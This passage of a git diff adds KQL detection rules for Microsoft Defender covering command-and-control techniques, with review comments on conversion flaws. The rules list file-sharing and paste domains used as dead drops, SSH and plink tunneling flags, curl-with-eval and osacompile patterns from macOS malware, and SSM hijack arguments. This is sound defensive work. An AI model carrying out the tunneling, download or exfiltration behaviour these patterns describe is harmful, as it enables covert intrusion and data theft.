(InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\"))))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql new file mode 100644 index 00000000..60068ecd --- /dev/null +++ b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql 
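Review bot: The exclusion list on the `| where` line contains `InitiatingProcessFolderPath =~ ""` and `isnull(InitiatingProcessFolderPath)`, so any connection to `azurewebsites.net` whose initiating process path was not recorded is silently dropped rather than surfaced; the same two clauses appear in the dead-drop-resolver hunk below. That mirrors the upstream rule, but it means the events with the least context are the ones never shown, so it deserves a comment such as `// Note: events with an empty or unknown initiating process path are excluded; review separately if coverage of unattributed connections is wanted`. Separately, the two PRTG entries use `endswith` with a full drive-letter path (`InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe"`), which behaves as an exact match here but reads as a mistake; `in~ (...)` as used for the Chrome and Firefox entries would be consistent.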
@@ -0,0 +1,15 @@ +// Title: New Connection Initiated To Potential Dead Drop Resolver Domain +// Author: Sorina Ionescu, X__Junior (Nextron Systems) +// Date: 2022-08-17 +// Level: high +// Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. +In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 +// False Positives: +// - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender. +// - Ninite contacting githubusercontent.com + +DeviceNetworkEvents +| where (RemoteUrl endswith ".t.me" or RemoteUrl endswith "4shared.com" or RemoteUrl endswith "abuse.ch" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "cloudflare.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "discord.com" or RemoteUrl endswith "docs.google.com" or RemoteUrl endswith "drive.google.com" or RemoteUrl endswith "dropbox.com" or RemoteUrl endswith "dropmefiles.com" or RemoteUrl endswith "facebook.com" or RemoteUrl endswith "feeds.rapidfeeds.com" or RemoteUrl endswith "fotolog.com" or RemoteUrl endswith "ghostbin.co/" or RemoteUrl endswith "githubusercontent.com" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "imgur.com" or RemoteUrl endswith "livejournal.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onedrive.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith 
"pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "reddit.com" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "steamcommunity.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "technet.microsoft.com" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "twitter.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "vimeo.com" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "wetransfer.com" or RemoteUrl endswith "workers.dev" or RemoteUrl endswith "youtube.com") and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or ((RemoteUrl endswith "discord.com" or RemoteUrl endswith "cdn.discordapp.com") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and 
InitiatingProcessFolderPath endswith "\\Discord.exe") or (RemoteUrl endswith "dropbox.com" and (InitiatingProcessFolderPath endswith "\\Dropbox.exe" or InitiatingProcessFolderPath endswith "\\DropboxInstaller.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (RemoteUrl endswith "drive.google.com" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Google\\Drive File Stream\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Google\\Drive File Stream\\") and InitiatingProcessFolderPath endswith "GoogleDriveFS.exe") 
or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or ((RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz") and (InitiatingProcessFolderPath endswith "\\MEGAsync.exe" or (InitiatingProcessFolderPath contains "\\MEGAsyncSetup32_" and InitiatingProcessFolderPath contains "RC.exe") or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup32.exe" or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup64.exe" or InitiatingProcessFolderPath endswith "\\MEGAupdater.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\midori-ng\\" and InitiatingProcessFolderPath endswith "\\Midori Next Generation.exe") or isnull(InitiatingProcessFolderPath) or (RemoteUrl endswith "onedrive.com" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath endswith "\\OneDrive.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath 
endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (RemoteUrl endswith ".t.me" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\Telegram Desktop\\" and InitiatingProcessFolderPath endswith "\\Telegram.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\")) or (RemoteUrl endswith "facebook.com" and InitiatingProcessFolderPath endswith "\\WhatsApp.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\"))))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql new file mode 100644 index 00000000..06f4adac --- /dev/null +++ b/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql 
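Review bot: The second line of the description, `In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.`, has no `//` prefix, so the file as committed is not a valid KQL query; the same conversion artifact appears in the Qemu hunk (`Threat actors have leveraged this utility ...`). Multi-line Sigma descriptions need every continuation line emitted as `// ...` by the converter, which is the place to fix this rather than the two files. Also, the selection term `RemoteUrl endswith "ghostbin.co/"` carries a trailing slash; if `RemoteUrl` holds only the host name, as every other term in the list assumes, this entry can never match and should read `RemoteUrl endswith "ghostbin.co"`.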
@@ -0,0 +1,12 @@
+// Title: Outbound Network Connection Initiated By Script Interpreter
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-28
+// Level: high
+// Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate scripts
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ipv4_is_in_range(RemoteIP, "20.0.0.0/11"))))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql b/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql
new file mode 100644
index 00000000..a99fec95
--- /dev/null
+++ b/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql
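Review bot: `ipv4_is_in_range` is applied to the IPv6 ranges `"::1/128"`, `"fe80::/10"` and `"fc00::/7"` on the `| where` line; the function is documented to return null when an argument is not a valid IPv4 range, and under Kusto's null semantics `false or null` stays null, so for a public IPv4 `RemoteIP` the whole `not(...)` should evaluate to null and the row is filtered out — the rule would then never fire on the connections it targets. Replace those three terms with `ipv6_is_in_range(RemoteIP, "::1/128")`, `ipv6_is_in_range(RemoteIP, "fe80::/10")` and `ipv6_is_in_range(RemoteIP, "fc00::/7")` (the ipv6 functions accept IPv4 input as well), or wrap the private-range test in `coalesce(..., false)` so that an unparsable address cannot suppress the event. This is worth a regression test with one public and one private address once the conversion script has a test suite.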
@@ -0,0 +1,12 @@
+// Title: Port Forwarding Activity Via SSH.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-12
+// Level: medium
+// Description: Detects port forwarding activity via SSH.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.lateral-movement, attack.t1572, attack.t1021.001, attack.t1021.004
+// False Positives:
+// - Administrative activity using a remote port forwarding to a local port
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R " or ProcessCommandLine contains " –R " or ProcessCommandLine contains " —R " or ProcessCommandLine contains " ―R ") and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql b/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql
new file mode 100644
index 00000000..d7aeff45
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql
@@ -0,0 +1,12 @@
+// Title: Potential Amazon SSM Agent Hijacking
+// Author: Muhammad Faisal
+// Date: 2023-08-02
+// Level: medium
+// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
+// False Positives:
+// - Legitimate activity of system administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe"
\ No newline at end of file
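Review bot: The description of the Amazon SSM hunk says the pattern comes from "the Mitiga research report", but no reference is carried into the file; the Linux variant below and the Qemu hunk ("as reported by Kaspersky") have the same gap, which suggests the converter drops the upstream rule's reference list. Emit it as `// References:` lines after `// Tags:` so an analyst can check the provenance of the `-register`/`-code`/`-id`/`-region` pattern without going back to the YAML. Fixing it once in the conversion script is better than hand-editing the generated rules.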
diff --git a/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql b/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql
new file mode 100644
index 00000000..e4aa4b71
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potential COM Objects Download Cradles Usage - Process Creation
+// Author: frack113
+// Date: 2022-12-25
+// Level: medium
+// Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of the library
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "[Type]::GetTypeFromCLSID(" and (ProcessCommandLine contains "0002DF01-0000-0000-C000-000000000046" or ProcessCommandLine contains "F6D90F16-9C73-11D3-B32E-00C04F990BB4" or ProcessCommandLine contains "F5078F35-C551-11D3-89B9-0000F81FE221" or ProcessCommandLine contains "88d96a0a-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "AFBA6B42-5692-48EA-8141-DC517DCF0EF1" or ProcessCommandLine contains "AFB40FFD-B609-40A3-9828-F88BBE11E4E3" or ProcessCommandLine contains "88d96a0b-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "2087c2f4-2cef-4953-a8ab-66779b670495" or ProcessCommandLine contains "000209FF-0000-0000-C000-000000000046" or ProcessCommandLine contains "00024500-0000-0000-C000-000000000046")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql b/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql
new file mode 100644
index 00000000..a0a9fa10
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL File Download Via PowerShell Invoke-WebRequest
+// Author: Florian Roth (Nextron Systems), Hieu Tran
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1059.001, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IRM " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql b/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql
new file mode 100644
index 00000000..90364892
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql
@@ -0,0 +1,10 @@
+// Title: Potential Download/Upload Activity Using Type Command
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-14
+// Level: medium
+// Description: Detects usage of the "type" command to download/upload data from WebDAV server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "type \\\\" and ProcessCommandLine contains " > ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > \\\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql b/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql
new file mode 100644
index 00000000..18429419
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql
@@ -0,0 +1,10 @@
+// Title: Potential In-Memory Download And Compile Of Payloads
+// Author: Sohan G (D4rkCiph3r), Red Canary (idea)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1059.007, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains "curl"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql b/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql
new file mode 100644
index 00000000..326945dc
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql
@@ -0,0 +1,12 @@
+// Title: Potential Linux Amazon SSM Agent Hijacking
+// Author: Muhammad Faisal
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
+// False Positives:
+// - Legitimate activity of system administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "/amazon-ssm-agent"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql b/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql
new file mode 100644
index 00000000..bf7e4e9f
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql
@@ -0,0 +1,10 @@
+// Title: Potential RDP Tunneling Via Plink
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-04
+// Level: high
+// Description: Execution of plink to perform data exfiltration and tunneling
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":127.0.0.1:3389" and FolderPath endswith "\\plink.exe") or ((ProcessCommandLine contains ":3389" and FolderPath endswith "\\plink.exe") and (ProcessCommandLine contains " -P 443" or ProcessCommandLine contains " -P 22"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql b/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql
new file mode 100644
index 00000000..df83627f
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql
@@ -0,0 +1,10 @@
+// Title: Potential RDP Tunneling Via SSH
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-12
+// Level: high
+// Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ":3389" and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql b/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql
new file mode 100644
index 00000000..346ab1f1
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql
@@ -0,0 +1,10 @@
+// Title: Potential WizardUpdate Malware Infection
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: high
+// Description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "=$(curl " and ProcessCommandLine contains "eval") and FolderPath endswith "/sh") or (ProcessCommandLine contains "_intermediate_agent_" and FolderPath endswith "/curl")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql b/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql
new file mode 100644
index 00000000..a84e9188
--- /dev/null
+++ b/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql
@@ -0,0 +1,10 @@
+// Title: Potential XCSSET Malware Infection
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: medium
+// Description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "/sys/log.php" or ProcessCommandLine contains "/sys/prepod.php" or ProcessCommandLine contains "/sys/bin/Pods") and FolderPath endswith "/curl" and InitiatingProcessFolderPath endswith "/bash") and ProcessCommandLine contains "https://") or (((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/osacompile" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "LSUIElement" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/plutil" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "-r" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/zip"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql b/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql
new file mode 100644
index 00000000..eb551610
--- /dev/null
+++ b/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql
@@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Network Connection To Notion API +// Author: Gavin Knapp +// Date: 2023-05-03 +// Level: low +// Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured. + +DeviceNetworkEvents +| where RemoteUrl contains "api.notion.com" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath 
endswith "\\AppData\\Local\\Programs\\Notion\\Notion.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql
new file mode 100644
index 00000000..23c68aef
--- /dev/null
+++ b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Usage Of Qemu
+// Author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)
+// Date: 2024-06-03
+// Level: medium
+// Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment.
+Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090, attack.t1572
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-m 1M" or ProcessCommandLine contains "-m 2M" or ProcessCommandLine contains "-m 3M") and (ProcessCommandLine contains "restrict=off" and ProcessCommandLine contains "-netdev " and ProcessCommandLine contains "connect=" and ProcessCommandLine contains "-nographic")) and (not((ProcessCommandLine contains " -cdrom " or ProcessCommandLine contains " type=virt " or ProcessCommandLine contains " -blockdev ")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql b/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql
new file mode 100644
index 00000000..7b43f616
--- /dev/null
+++ b/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql
